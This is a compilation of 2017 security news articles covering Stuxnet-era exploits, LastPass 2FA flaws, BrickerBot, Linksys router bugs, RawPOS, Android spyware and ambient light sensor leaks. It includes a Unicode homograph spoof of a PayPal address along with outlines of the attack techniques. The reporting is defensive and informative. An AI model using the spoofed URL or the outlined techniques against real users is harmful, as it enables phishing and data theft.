The security firm said more than 297,000 users were hit by zero-day or heavily obfuscated known exploits in 2016, and the most common exploit, same as in the previous year, was CVE-2010-2568, a vulnerability leveraged by the notorious Stuxnet malware.
Between 2010 and 2016, malicious actors used more than 80 vulnerabilities in targeted attacks. The Russia-linked threat group known as APT28 and Fancy Bear leveraged 25 flaws, including at least six zero-days, followed by the NSA-linked Equation Group, which used roughly 17 vulnerabilities, including at least eight zero-days.
Groups that launched targeted attacks have mainly relied on Windows flaws, followed by Flash Player, Office, Java and Internet Explorer. The most popular vulnerability is CVE-2012-0158, which is still being used by APT actors.
The Stuxnet vulnerability is still one of the most exploited flaws in the wild by hackers
21.4.2017 securityaffairs CyberWar
A new report published by Kaspersky confirms that Stuxnet exploits targeting a Windows Shell Vulnerability is still widely adopted by threat actors.
The case that I’m going to present you demonstrates the importance of patch management and shows the effects of the militarization of the cyberspace.
Unpatched software is an easy target for hackers that can exploit old vulnerabilities to compromise the systems running them. Let’s consider for example the exploit code used in the notorious Stuxnet cyber weapon that hit the centrifuges at the Iranian nuclear plant at Natanz.
The flaw exploited by the Stuxnet worm was first patched by Microsoft in 2010, but threat actors in the wild continue to exploit it in a huge number of cyber attack.
According to Kaspersky Lab, the flaw used by Stuxnet to target Windows machines, tracked as CVE-2010-2568 has been weaponized to remotely execute code on unpatched Windows computers.
The dangerous trend continues, in August 2014 experts from Kaspersky revealed that in the period between November 2013 and June 2014, the Windows Shell vulnerability (CVE-2010-2568) exploited by Stuxnet was detected 50 million times targeting nearly 19 million machines all over the world.
In 2015, and in 2016, roughly one of four of the Kaspersky users was targeted by an exploit code leveraging on the CVE-2010-2568.
“To take just one example, when we looked at our most recent threat statistics we found that exploits to CVE-2010-2568 (used in the notorious Stuxnet campaign) still rank first in terms of the number of users attacked. Almost a quarter of all users who encountered any exploit threat in 2016 were attacked with exploits to this vulnerability.” states a report published by Kaspersky.
Of course, the CVE-2010-2568 vulnerability only affects very old OS, including Windows XP and Windows Server 2008, and unpatched versions of Windows 7.
Attackers most used the Stuxnet exploit code to create malicious codes that can “self-replicate” over a targeted network.
Concluding, the militarization of the cyberspace has serious consequences on Internet users, even if the malware was spread many years ago.
I suggest the reading of the research published by Kaspersky that provides interesting data on most exploited vulnerabilities and threat actors leveraging on them.
Arrest of WikiLeaks's Assange a 'Priority': US Top Cop
21.4.2017 securityweek BigBrothers
The arrest of WikiLeaks founder Julian Assange is a US "priority," Attorney General Jeff Sessions said Thursday, as media reports indicated his office was preparing charges against the fugitive anti-hero.
"We are going to step up our effort and already are stepping up our efforts on all leaks," Sessions, America's top cop, said at a news conference in response to a reporter's question about a US priority to arrest Assange.
The Justice Department chief said a rash of leaks of sensitive secrets appeared unprecedented.
"This is a matter that's gone beyond anything I'm aware of. We have professionals that have been in the security business of the United States for many years that are shocked by the number of leaks and some of them are quite serious," he said.
"Whenever a case can be made, we will seek to put some people in jail."
Prosecutors in recent weeks have been drafting a memo that looks at charges against Assange and members of WikiLeaks that possibly include conspiracy, theft of government property and violations of the Espionage Act, the Washington Post reported, citing unnamed US officials familiar with the matter.
Several other media outlets also cited unnamed officials as saying US authorities were preparing charges against Assange. The Justice Department declined to comment on the reports.
Assange, 45, has been holed up at the Ecuadoran embassy in London since 2012 trying to avoid extradition to Sweden where he faces a rape allegation that he denies.
He fears Sweden would extradite him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents that first gained attention in 2010.
Assange's case returned to the spotlight after WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and the Democratic party.
US officials say the emails were hacked with the aid of the Russian government in its bid to influence the US election.
Critics say their release late in the race helped to tip the November 8 election to Republican Donald Trump.
Trump and his administration have put heat on WikiLeaks after it embarrassed the Central Intelligence Agency last month by releasing a large number of files and computer code from the spy agency's top-secret hacking operations.
The documents showed how the CIA exploits vulnerabilities in popular computer and networking hardware and software to gather intelligence.
Supporters of WikiLeaks say it's practicing the constitutional right of freedom of speech and the press.
- 'Hostile intelligence service'-
CIA Director Mike Pompeo last week branded WikiLeaks a "hostile intelligence service," saying it threatens democratic nations and joins hands with dictators.
Pompeo focused on the anti-secrecy group and other leakers of classified information like Edward Snowden as one of the key threats facing the United States.
"WikiLeaks walks like a hostile intelligence service and talks like a hostile intelligence service. It has encouraged its followers to find jobs at CIA in order to obtain intelligence... And it overwhelmingly focuses on the United States, while seeking support from anti-democratic countries and organizations," said Pompeo.
"It is time to call out WikiLeaks for what it really is -- a non-state hostile intelligence service often abetted by state actors like Russia."
The day before Pompeo spoke, Assange published an opinion piece in The Washington Post in which he said his group's mission was the same as America's most respected newspapers: "to publish newsworthy content."
"WikiLeaks's sole interest is expressing constitutionally protected truths," he said, professing "overwhelming admiration for both America and the idea of America."
Flaws Allowed Hackers to Bypass LastPass 2FA
21.4.2017 securityweek Vulnerebility
LastPass vulnerabilities
Design flaws in LastPass’ implementation of two-factor authentication (2FA) could have been exploited by hackers to bypass the protection mechanism and gain access to user accounts.
Martin Vigo, one of the Salesforce researchers who in November 2015 reported finding several vulnerabilities in LastPass, has once again analyzed the popular password manager, particularly its 2FA mechanism.
The temporary 2FA codes are generated based on several variables, including a secret seed which is typically encoded in a QR code that the user scans with a 2FA app such as Google Authenticator.
Vigo’s tests showed that the request made when a QR code image was displayed to the user contained the login hash used by LastPass for authentication. In fact, the 2FA secret seed had been derived from the user’s password, which defeated the entire purpose of 2FA protection as the attacker presumably already possesses the password.
While determining the URL of the QR code was not difficult, a hacker needed to be authenticated for the attack to work. However, exploiting a cross-site request forgery (CSRF) vulnerability could address this problem. Getting a logged-in user to click on a specially crafted link that exploits a CSRF flaw could have allowed an attacker to obtain the QR code image.
According to Vigo, an attacker could have also leveraged cross-site scripting (XSS) vulnerabilities on popular websites to avoid having the victim visit his malicious site, which would be more likely to raise suspicion.
The researcher also found a simple way to disable 2FA using a CSRF vulnerability. As with all CSRF attacks, the hacker needed to get the victim to visit a malicious website.
LastPass was informed about these vulnerabilities on February 7 and immediately started working on patches. The company addressed the CSRF flaws, added a security mechanism for checking the origin of a QR code request, and eliminated the use of password hashes for the secret seed.
In a blog post published on Thursday, LastPass informed users that they don’t need to take any action as all the fixes have been done on the server side. The company also pointed out that exploiting the flaws required a combination of factors that made attacks more difficult.
“To exploit this issue an attacker would have needed to take several steps to bypass Google Authenticator,” LastPass said. “First, the attacker would have had to lure a user to a nefarious website. Second, the user would have to be logged in to LastPass at the time of visiting the malicious site.”
Vigo’s disclosure comes shortly after Google Project Zero researcher Tavis Ormandy reported finding several vulnerabilities in the LastPass browser extensions.
ICS-CERT Warns of BrickerBot's IoT Device Damaging Capabilities
21.4.2017 securityweek BotNet
The Department of Homeland Security’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) has issued an alert on BrickerBot, a piece of malware designed to permanently disable Internet of Things (IoT) devices.
Discovered earlier this month, the malware is capable of what Radware researchers call Permanent Denial-of-Service (PDoS). Two versions of the malware were observed to date, both featuring the same capabilities: they can damage the compromised devices’ firmware and disable basic functions.
Citing the Radware report, ICS-CERT warns that one version of BrickerBot is targeting devices running BusyBox that have an exposed Telnet command window, and which also have SSH exposed through an older version of Dropbear SSH server. Identified as Ubiquiti network devices, most of these run outdated firmware, while some are access points or bridges with beam directivity.
BrickerBotThe second malware variant is targeting Linux-based devices both with and without BusyBox, but which expose a Telnet service secured with default or hard-coded passwords. This variant also uses TOR exit nodes to hide the source of the attack, ICS-CERT’s alert also points out.
While BrickerBot.1 has been active for only about a week, between March 20 and March 25, BrickerBot.2 continues to operate. What is not known for the time being, however, is what type of devices are used to launch these attacks, or how many of them are.
In a new announcement, Radware reveals that the IP camera they tested the discovered malware on stopped working completely, and that a factory reset didn’t restore functionality. The security firm also notes that users might not even be aware of the malware attack, and could simply believe they bought faulty hardware.
ICS-CERT says it is working on identifying vendors of affected devices and on collecting detailed mitigation information. Until that happens, however, users can take some steps to protect their devices, such as changing the default credentials, disabling Telnet access to the device, and setting intrusion protection systems to block Telnet default credentials or reset Telnet connections.
These steps should keep devices protected from other threats as well, including Mirai, the distributed denial of service botnet that has been wreaking havoc among insecure IoT devices for more than half a year.
Users can also use network behavioral analysis to detect anomalies in traffic, along with automatic signature generation for protection. Ubiquiti Networks device owners are also advised to update to the latest firmware. Using strong passwords and disabling or renaming default system accounts should also help improving protection.
“ICS-CERT strongly encourages asset owners not to assume that their control systems are deployed securely or that they are not operating with an Internet accessible configuration. Instead, asset owners should thoroughly audit their networks for Internet facing devices, weak authentication methods, and component vulnerabilities. Control systems often have Internet accessible devices installed without the owner’s knowledge, putting those systems at increased risk of attack,” ICS-CERT’s alert reads.
The fact that new malware targeting IoT devices can permanently disable them shouldn’t come as a surprise, Bill Diotte, CEO, Mocana Corporation, told SecurityWeek in an emailed statement.
“IoT designers and manufacturers must start presuming that their devices will be subject to attack the minute they are connected to the Internet. The industry needs to make security as high a priority as performance and free overnight shipping,” Diotte said.
Chrome Addresses Threat of Unicode Domain Spoofing
21.4.2017 securityweek Phishing
Chrome 58 Resolves Unicode Domain Spoofing
Google on Wednesday released Chrome 58 to the stable channel for Windows, Mac and Linux to address 29 vulnerabilities, including an issue that rendered users vulnerable to Unicode domain phishing.
Demonstrated by web developer Xudong Zheng, the bug resides in the use of Unicode characters in Internet hostnames through Punycode. By using characters that may look the same but are represented differently in Punycode, malicious actors can spoof legitimate websites and use them in phishing attacks.
The issue was also demonstrated by Avanan researchers in December 2016, when they stumbled upon live phishing attacks targeting Office 365 business email users. Using Unicode characters, attackers could create a site looking like http://www.pаypal.com/, but which actually resolved to http://www.xn--pypal-4ve.com/, thus bypassing Office 365’ anti-phishing defenses, the researchers explained.
Chrome 58 addresses the bug, which Google refers to as an URL spoofing in Omnibox (CVE-2017-5060). Assessed only a Medium severity rating, the vulnerability earned Xudong Zheng a $2000 bounty.
Two other Medium risk URL spoofing in Omnibox flaws were addressed as well: CVE-2017-5061, discovered by Haosheng Wang (awarded $2000), and CVE-2017-5067, credited to Khalil Zhani (awarded $500).
Only 12 of the 29 security fixes in Chrome 28 were for flaws discovered by external researchers: three rated High severity, 8 Medium risk, and one Low severity.
The High risk flaws include a Type confusion in PDFium (CVE-2017-5057), found by Guang Gong of Alpha Team, Qihoo 360 ($3000); a Heap use after free in Print Preview (CVE-2017-5058), discovered by Khalil Zhani ($2000); and a Type confusion in Blink (CVE-2017-5059), credited to SkyLined working with Trend Micro's Zero Day Initiative.
The Medium severity bugs also included a Use after free in Chrome Apps (CVE-2017-5062), a Heap overflow in Skia (CVE-2017-5063), a Use after free in Blink (CVE-2017-5064), Incorrect UI in Blink (CVE-2017-5065), and Incorrect signature handing in Networking (CVE-2017-5066).
The Low severity vulnerability was a Cross-origin bypass in Blink tracked as CVE-2017-5069 and was discovered by Michael Reizelman.
RawPOS Malware Steals Driver's License Information
21.4.2017 securityweek Virus
The RawPOS Point-of-Sale (PoS) RAM scraper malware was recently observed stealing driver’s license information from victims, Trend Micro has discovered.
RawPOS is one of the oldest PoS malware families out there, with patterns matching its activity dating as far back as 2008. Over time, the actors behind it have focused mainly on the hospitality industry, and have been using the same malware components and tools for lateral movement.
These actors have since started gathering additional information from the compromised systems, which put victims at greater risk of identity theft, researchers warn. The driver’s license information stolen by the malware can be used by cybercriminals in their malicious activities.
RawPOS, Trend Micro explains, attempts to gather both credit card mag stripe data and other types of valuable information in a single sweep, while modifying the regex string to capture the needed data. The malware scans processes to find “track data”-like strings in memory. It then dumps process memory for a file scraper to organize the data.
The threat used almost the same pattern matching for the first eight years, but changed it in 2016 to start looking for “drivers” and “license” strings, as well as for an “ANSI 636” string. This is a mandatory PDF417 bar code to aid in “identity and age verification, automation of administrative processing, and address verification,” as defined in the 2013 North American AAMVA DL/ID Card Design Standard.
Because the numbers “636” are the initial digits of the Issuer Identification Number (IIN) for most US states, the security researchers concluded that the actors were interested in driver’s license information within the US.
“The Information stored in each license varies per state, but the bar code mostly contains the same information present in each individual driver’s license or state ID – specifically: full name, date of birth, full address, gender, height, even hair and eye color,” Trend Micro says.
The use of this barcode isn’t unheard of, albeit it is less common than credit card swipes, the security researchers explain. The driver’s license barcode could get scanned in pharmacies, retail shops, bars, casinos and others establishments that require it.
The use of personal information next to the stolen credit card details provides threat actors with a more “authentic” identity, while also allowing them to complete a transaction even if they don’t have the physical card.
“Aside from this, the driver’s license bar code swipe of the victims can also be used for other kinds of misrepresentation, such as identity theft. In any case, stolen Personal Identity Information (PII) will always be a serious issue that can lead to dire consequences for its victims,” the security researchers explain.
Anatomy of Cybercriminal Communications: Why do crooks prefer Skype
21.4.2017 securityaffairs CyberCrime
Security firm Flashpoint published an interesting paper titled, ‘Cybercrime Economy: An Analysis of Cybercriminal Communication Strategies‘ about cybercriminal communications of threat actors.
A recent research by the threat intelligence firm Flashpoint has uncovered how malicious threat actors communicate to share information between them.
The research has found out that there is a growing economy in the cybercriminals communications, more than just information sharing it has formed an ecosystem in which the failures, successes, planning and procedures to beat the organization’s countermeasures are shared as well as the planning of attacks.
The research points out that Cybercriminal Communications use a variety of software alongside with the access to communities in the deep and dark web. This is done in order to carry out cross domain organization for commit crimes like phishing, credit card fraud, spam, and every sort of attack that pass through the corporations’ filters and defenses.
The reason for the use of this software to communicate is too difficult law enforcement agencies from tracking the activities in the community’s forums as well as to give privacy to the user since most of these programs have cryptographic functions or protocols operating in its core. The software also allows a user to enter random, aleatory or even fraudulent information about the user which difficulty, even more, the process of detection.
On the other hand, one other reason for doing so is the payment required to maintain a forum, which in many cases can represent a difficult for cybercriminals. The use of communications programs is free of charge and anyone can download them.
The study was carried out by monitoring underground communities where the users often invited other members to discuss the planning outside the underground forum. It was analyzed 80 instant messengers applications and protocols, of which at least five were more used.
Privacy is implemented in these applications, like PGP an algorithm of encryption. The secure communication of user’s difficulty authorities to gain access to the content shared between the users. Without knowing the encryption key that has generated the codification for the session.
The most used programs by cybercriminals are ICQ, Skype, Jaber, Quiet Internet Pager, Pretty Good Privacy, Pidgin, PSI and AOL Instant Messenger (AIM).
The report shows that the use of Cybercriminal Communications is different among communities of different languages, below are reported “Language Group Specific Findings” for Russians we have the following situation:
1. Jabber (28.3%) 2. Skype (24.26) 3. ICQ (18.74%) 4. Telegram (16.39%) 5. WhatsApp (3.93%) 6. PGP (3.79%) 7. Viber (3.01%) 8. Signal (1.58%)
while for the Chinese we have the following distribution in 2016: 1. QQ (63.33%) 2. WeChat (35.58%) 3. Skype (0.44%) 4. WhatsApp (0.22%) 5. Jabber (0.31%) 6. PGP (0.13%) 7. ICQ (0.1%) 8. AOL Instant Messenger (0.08%)
“Cybercriminals can choose from a wide variety of platforms to conduct their peer-to-peer (P2P) communications.” states the report. “This choice is typically influenced by a combination of factors, which can include:
Ease of use
Country and/or Language
Security and/or anonymity concerns
Sources:
http://www.securityweek.com/many-cybercriminals-prefer-skype-communications-study
http://www.ibtimes.co.uk/skype-whatsapp-how-cybercriminals-share-hacking-tips-tricks-online-1617822
http://www.itnews.com/article/3190830/security/report-cybercriminals-prefer-skype-jabber-and-icq.html
http://www.infoworld.com/article/3190563/encryption/cybercriminals-prefer-to-chat-over-skype.html
https://www.flashpoint-intel.com/blog/cybercrime/cybercriminal-communication-strategies/
Vulnerabilities in Linksys routers allow attackers to hijack dozens of models
21.4.2017 securityaffairs Vulnerebility
Cyber security experts disclosed the existence of 10 unpatched security flaws in dozens of Linksys routers widely used today.
The IOActive senior security consultant Tao Sauvage and the independent security researcher Antide Petit have reported more than a dozen of unpatched security vulnerabilities affecting 25 different Linksys Smart Wi-Fi Routers models.
The security duo published a blog post on Wednesday providing details of their discoveries.Attackers can exploit the security vulnerabilities to extract sensitive information from the devices, trigger DoS conditions, change settings, and completely take them over.The vulnerabilities effects dozens of Linksys models, including EA3500 Linksys Smart Wi-Fi, WRT and Wireless-AC series.Linksys routers flaws
Out of 10 security vulnerabilities, six issues can be exploited by remote unauthenticated attackers.
All these products are widely by private users and by small businesses, for this reason, the impact of the discovery is huge. It has been estimated that over 7,000 routers that have their web-based administrative interfaces exposed to the Internet are exposed to attacks.
The experts discovered determined that 11 percent of the 7,000 Linksys routers still used default credentials.
“We performed a mass-scan of the ~7,000 devices to identify the affected models. In addition, we tweaked our scan to find how many devices would be vulnerable to the OS command injection that requires the attacker to be authenticated. We leveraged a router API to determine if the router was using default credentials without having to actually authenticate.” reads the blog post published by the two experts.
“We found that 11% of the ~7000 exposed devices were using default credentials and therefore could be rooted by attackers.”
Most of the flawed Linksys routers (~69%) are located in the USA, followed by Canada (~10%), Hong Kong (~1.8%), Chile (~1.5%), and the Netherlands (~1.4%).
If we consider the possibility that a local attacker exploits the issues to target systems over a local area network, the number of devices at risk dramatically increases.
The experts avoided to provided technical details about the flaw in the Linksys routers to avoid mass attacks against the vulnerable devices. The duo confirmed that two of the flaws could be exploited to trigger a denial-of-service condition on flawed routers, making them unusable or reboot by sending specifically crafted requests to a specific API.
Other vulnerabilities affecting the web interfaces of the Linksys routers allow attackers to bypass authentication and access many CGI scripts that can reveal sensitive information about the flawed devices and their configurations. An attacker can exploit the issues to obtain the Wi-Fi Protected Setup (WPS) PIN and to access the wireless network for further lateral movement from within. An attacker can exploit the vulnerability to determine firmware and kernel versions of the vulnerable Linksys routers and obtain a list of running processes, information about computers connected to the routers, a list of USB devices and the configuration settings for the FTP and SMB file-sharing servers.
The most severe flaw discovered by the experts could be exploited by attackers to inject and execute shell commands with root privileges on the affected routers. The flaw could be exploited to set up a backdoor administrative account that wouldn’t be listed in the web interface.
“Finally, authenticated attackers can inject and execute commands on the operating system of the router with root privileges. One possible action for the attacker is to create backdoor accounts and gain persistent access to the router. Backdoor accounts would not be shown on the web admin interface and could not be removed using the Admin account.” states the post.The flaw requires authentication to be exploited, this means the attackers need to have access to an existing account.
“It should be noted that we did not find a way to bypass the authentication protecting the vulnerable API; this authentication is different than the authentication protecting the CGI scripts.”
Linksys confirmed it is currently working on firmware updates to fix the vulnerabilities, meantime, as mitigation measures it suggests users disable the guest Wi-Fi network feature on their routers.
“Linksys was recently notified of some vulnerabilities in our Linksys Smart Wi-Fi series of routers.
As we work towards publishing firmware updates, as a temporary fix, we recommend that customers using Guest Networks on any of the affected products below temporarily disable this feature to avoid any attempts at malicious activity.” states the advisory. “We
will be releasing firmware updates for all affected devices.”
The complete list of vulnerable Linksys routers is reported in the security advisory issued by the company.
The RawPOS PoS Malware also scans for driver’s license data
21.4.2017 securityaffairs Virus
According to Trend Micro, the RawPOS PoS malware was recently used to steal driver’s license information from victims.
Security experts at Trend Micro have spotted a new variant of the RawPOS PoS malware stealing driver’s license information from victims.
The RawPOS PoS malware is an old threat that has been active since 2008. RAWPOS is a memory scraper that has infected lodging merchants since 2008 by targeting the memory dump where payment information may be temporarily stored, and that data are staged on a network and removed later by a separate process.
The malicious code was mainly used against targets in the hospitality industry, aver the time crooks used it to steal also additional information from victims.
Back to the present, crooks steal driver’s license information for several fraudulent activities. According to Trend Micro, the version of the RawPOS PoS malware recently spotted attempts to gather both credit card mag stripe data and other valuable information in a single sweep.
“Traditionally, PoS threats look for credit card mag stripe data and use other components such as keyloggers and backdoors to get other valuable information. RawPOS attempts to gather both in one go, cleverly modifying the regex string to capture the needed data.” reads the analysis published by TrendMicro.
The RawPOS PoS malware uses regular expressions to scan processes for strings that look like data stored in the magnetic stripe in order to find “track data”-like strings in memory.
The analysis of the regular expressions used by the threat demonstrates that starting from 2016 the malware scans memory for “drivers” and “license” strings, as well as for an “ANSI 636” string (“636” are the initial digits of the Issuer Identification Number (IIN) for most US states).
Crooks behind the last variant of the PoS malware were interested in driver’s license information belonging to US citizens.
“The Information stored in each license varies per state, but the bar code mostly contains the same information present in each individual driver’s license or state ID – specifically: full name, date of birth, full address, gender, height, even hair and eye color,” continues Trend Micro.
Researchers explained that driver’s license barcode could get scanned in many commercial activities, including pharmacies, retail shops, bars, and casinos.
The availability of personal information along with credit card data provides threat actors with a more “authentic” identity.
“Combining personal information combined with credit card information gives threat actors a more “authentic” identity, and also provides all the information necessary to complete a transaction despite the lack of a physical card. “concluded Trend Micro.” Aside from this, the driver’s license bar code swipe of the victims can also be used for other kinds of misrepresentation, such as identity theft. ”
Beware! Dozens of Linksys Wi-Fi Router Models Vulnerable to Multiple Flaws
20.4.2017 thehackernews Vulnerebility
Bad news for consumers with Linksys routers: Cybersecurity researchers have disclosed the existence of nearly a dozen of unpatched security flaws in Linksys routers, affecting 25 different Linksys Smart Wi-Fi Routers models widely used today.
IOActive's senior security consultant Tao Sauvage and independent security researcher Antide Petit published a blog post on Wednesday, revealing that they discovered 10 bugs late last year in 25 different Linksys router models.
Out of 10 security issues (ranging from moderate to critical), six can be exploited remotely by unauthenticated attackers.
According to the researchers, when exploited, the flaws could allow an attacker to overload the router, force a reboot by creating DoS conditions, deny legitimate user access, leak sensitive data, change restricted settings and even plant backdoors.
Many of the active Linksys devices exposed on the internet scanned by Shodan were using default credentials, making them susceptible to the takeover.
Researchers found more than 7,000 devices impacted by the security flaws at the time of the scan, though this does not include routers protected by firewalls or other network protections.
"We performed a mass-scan of the ~7,000 devices to identify the affected models," IOActive says. "We found that 11% of the ~7000 exposed devices were using default credentials and therefore could be rooted by attackers."
IOActive made Linksys aware of the issues in January this year and is working "closely and cooperatively" with the company ever since to validate and address the vulnerabilities.
Here's How critical are these Flaws:
The researchers did not reveal more details about the vulnerabilities until the patch is made available to users, although they said two of the flaws could be used for denial-of-service attacks on routers, making them unresponsive or reboot by sending fraudulent requests to a specific API.
Other flaws could allow attackers to bypass CGI scripts to collect sensitive data such as firmware versions, Linux kernel versions, running processes, connected USB devices, Wi-Fi WPS pins, firewall configurations, FTP settings, and SMB server settings.
CGI, or Common Gateway Interface, is a standard protocol which tells the web server how to pass data to and from an application.
Researchers also warned that attackers those have managed to gain authentication on the devices can inject and execute malicious code on the device's operating system with root privileges.
With these capabilities in hands, attackers can create backdoor accounts for persistent access that are even invisible in the router smart management console and so to legitimate administrators.
However, researchers did not find an authentication bypass that can allow an attacker to exploit this flaw.
List of Vulnerable Linksys Router Models:
Here's the list of Linksys router models affected by the flaws:
EA2700, EA2750, EA3500, EA4500v3, EA6100, EA6200, EA6300, EA6350v2, EA6350v3, EA6400, EA6500, EA6700, EA6900, EA7300, EA7400, EA7500, EA8300, EA8500, EA9200, EA9400, EA9500, WRT1200AC, WRT1900AC, WRT1900ACS, and WRT3200ACM.
The majority of the exposed devices (nearly 69%) are located in in the United States, and others are spotted in countries including Canada (almost 10%), Hong Kong (nearly 1.8%), Chile (~1.5%), and the Netherlands (~1.4%).
A small percentage of vulnerable Linksys routers have also been spotted in Argentina, Russia, Sweden, Norway, China, India, UK, and Australia.
Here's How you can Mitigate Attacks originating from these Flaws:
As temporary mitigation, Linksys recommended its customers to disable the Guest Network feature on any of its affected products to avoid any attempts at the malicious activity.
The company also advised customers to change the password in the default account in order to protect themselves until a new firmware update is made available to patch the problems.
Linksys is working to release patches for reported vulnerabilities with next firmware update for all affected devices. So users with Smart Wi-Fi devices should turn ON the automatically update feature to get the latest firmware as soon as the new versions arrive.
Millions Download "System Update" Android Spyware via Google Play
20.4.2017 securityweek Android
Millions of users looking to get Android software updates have been tricked into downloading spyware on their devices through the Google Play marketplace, Zscaler reveals.
Posing as a legitimate application called “System Update” and claiming to provide users with access to the latest Android software updates, the spyware made it to Google Play in 2014, and has registered between 1,000,000 and 5,000,000 downloads by the time Google was alerted and removed it from the store.
Instead of delivering to its promise, however, the malware spies on users’ exact geolocation, and can send it to the attacker in real time. It receives commands from its operator via SMS messages, the security researchers explain.
The application’s Google Play page should have been a warning to users that it wasn’t what it appeared to be, given that it displayed blank screenshots and users were complaining about its lack of functionality, yet many still downloaded and installed it. The page also stated that the “application updates and enables special location features.”
When the user attempts to run the installed app, however, an error message is displayed: “Unfortunately, Update Service has stopped.” In the background, the application sets up an Android service and broadcast receiver to fetch the last known location and scan for incoming SMS messages.
The spyware is looking for incoming messages that feature a specific syntax, Zscaler explains: “the message should be more than 23 characters and should contain ‘vova-’ in the SMS body. It also scans for a message containing ‘get faq’.”
The attacker can set a location alert when the device’s battery is running low, and can also set their own password for the spyware (the application comes with the default password “Vova”). After a phone number and password are set, the spyware starts a process to send the device’s location to the attacker.
“The SMS-based behavior and exception generation at the initial stage of startup can be the main reason why none of the antivirus engines on VirusTotal detected this app at the time of analysis,” Zscaler explains.
The application was last updated in December 2014 and managed to evade detection for a long time, but its functionality remained active. What’s more, the security researchers discovered the same code for stealing a victim’s location as the DroidJack Trojan that was discovered several years ago, and which was recently posing as fake Pokemon GO and Super Mario Run games for Android.
“There are many apps on the Google Play Store that act as a spyware; for example, those that spy on the SMS messages of one’s spouse or fetch the location of children for concerned parents. But those apps explicitly state their purpose, which is not the case with the app [in] this report. It portrayed itself as a system update, misleading users into thinking they were downloading an Android System Update,” Zscaler concludes.
Ambient Light Sensors Put Browser Data at Risk: Researchers
20.4.2017 securityweek Security
The ambient light sensors present in phones, tablets and laptops can be abused to obtain potentially sensitive information from a user’s web browser, researchers warned.
Ambient light sensors measure light intensity in the environment, which is useful for adjusting the brightness of the display and for proximity detection. The data collected by the sensor is fairly precise and the frequency of readings is relatively high.
Last year, researcher Lukasz Olejnik analyzed theoretical security and privacy implications of ambient light sensors. The expert recently teamed up with Artur Janc and they demonstrated how the W3C’s ambient light sensor API can be abused to steal data from web browsers.
Some members of the industry have proposed allowing websites to access ambient and other sensors without requiring explicit permission from the user. Recent versions of Firefox and Chrome have already implemented the W3C API – it’s enabled by default in the former and it can be manually activated in the latter.
Proof-of-concept (PoC) exploits created by the researchers show how an attacker can determine a user’s browsing history based on the color of links, and how they can steal cross-origin resources, such as images and frames.
In order to determine which websites have been visited by a user, Olejnik and Janc relied on the fact that a site can apply different styles to links that have been visited and ones that have not been accessed.
An attacker can create a webpage that sets link styles to white for visited links and black for not-visited links. The attacker’s page then starts displaying a list of popular domain names one by one. If a link has been visited, the screen turns white; if it hasn’t been accessed, it turns black. The ambient sensor can log the light level when each link is displayed, and determine if that website had been accessed by the user.
Researchers also demonstrated how an attacker can steal cross-origin resources, such as account recovery QR codes. In this case, the hacker’s website embeds an image of the QR code from the targeted domain into their own site. The image is converted to monochrome using SVG filters, and it’s scaled so that each pixel is expanded one by one to fill up the screen. The exploit goes through each pixel, and the ambient sensor logs a white or black pixel depending on what is on the screen.
In their experiments, researchers determined that this technique can be used for a fully reliable exploit at a rate of one bit per 500 ms. At this rate, an attacker can exfiltrate an 8-character password in 24 seconds, a 20x20 QR code in 3 minutes and 20 seconds, and a 64x64 pixel image in just over half an hour. As for stealing a user’s browsing history, it takes 8 minutes and 20 seconds to go through 1,000 popular URLs and determine if they have been visited.
While it’s unlikely that such an obvious attack can be carried out while the phone is used, Olejnik and Janc pointed out that an attack can be conducted at night via a site that uses the screen.keepAwake API to keep the display on while the exploit is running.
Researchers believe these types of attacks could be prevented by limiting the frequency of sensor readings. An even more efficient mitigation involves limiting the precision of sensor output (i.e. make it difficult for the color of the screen to influence the sensor reading).
Attacks can also be prevented if browser vendors require users to grant permission before giving websites access to the sensor. Both Google and Mozilla have been notified of the potential risks.
This is How Google Secures Devices for Its 61,000 Employees
20.4.2017 securityweek Safety
Google Details Its Implemenation of Tiered Access to Secure Devices for More Than 61,000 Employees
The easiest solution to access control is binary: network access is either granted or denied. It's a blunt tool that doesn't suit the modern business culture of maximizing user productivity and creativity. Granularity in access control, allowing users to access what is needed when it is needed, is a more suitable model for the modern business.
Google chose the Tiered Access model for its own workforce of some 61,000 employees. In a new whitepaper (PDF) and blog published today, it explains that it has "a culture of innovation that requires the freedom and flexibility to connect many different devices to many different assets and services."
This is an attitude that will resonate with many modern businesses.
"Tiered access was implemented in order to provide an access model appropriate for [Google's] very heterogeneous environment. It helps ensure the security of corporate resources while allowing users to make informed trade-offs around access and security controls." Many organizations offer their staff flexibility in the devices they use -- especially where a BYOD policy is in place.
Tiered access is achieved by first analyzing the client base devices and data sources; analyzing the services that are to be accessed; and choosing a gateway/access technology that can evaluate policies and make access decisions between the client base and service.
Google uses its own internally developed tools to collect the device data; but suggests other companies could use security reporting systems (logs), patch management systems, asset management systems and centralized management dashboards. The purpose is to gather device attributes and device state into a central repository.
The device attributes allow the definition of device baselines, based on things like vendor and operating system, and built-in security features. The device state, continuously monitored, highlights deviations from the device baseline. These two attributes can be used to associate devices to the different tiers.
"For example," explains Google, "an Android device at Google may access more sensitive data in higher trust tiers if it is a 'Fully Managed' device, meaning it provides full device control and access to detailed system and network logs." A lower trust tier is made accessible to BYOD devices with a work profile.
Between the device and the service sits an Access Control Engine that provides a service-level authorization to enterprise applications on a per-request basis. It queries the central repository in order to make policy decisions on what access is allowable -- it is where policy is defined and managed by security.
The 'tiers' in tiered access are levels of sensitivity applied to the organization's different services. Google uses just four tiers: untrusted; basic access; privileged access; and highly privileged access. It chose four tiers as a compromise between too many (making the system over-complex), and too few (which effectively recreates the binary access that the tiered approach seeks to improve).
While this is the current state of Google's tiered access solution to its on-site and mobile workforces, development is ongoing. It has four areas currently under consideration. The first is to increase the granularity of the system by improving "the precision of access decisions while balancing the need for users to understand security requirements."
The second is to add user attributes to the device attributes by considering "the user’s observed behavior and how that compares to normal activity as analyzed with machine learning." This will allow access based on both the device and current user behavior.
The third is to drive self-selection of trust tiers by encouraging people to voluntarily move across trust tiers in real-time; for example, to be at 'fully trusted' for the next two hours only.
Finally, Google hopes to improve the service on-boarding process. Since services are added or updated all the time, they all need to be classified in terms of risk and sensitivity. "To scale," suggests Google, "service owners must be empowered to make the right tier assignments themselves, which is a process that is constantly improving."
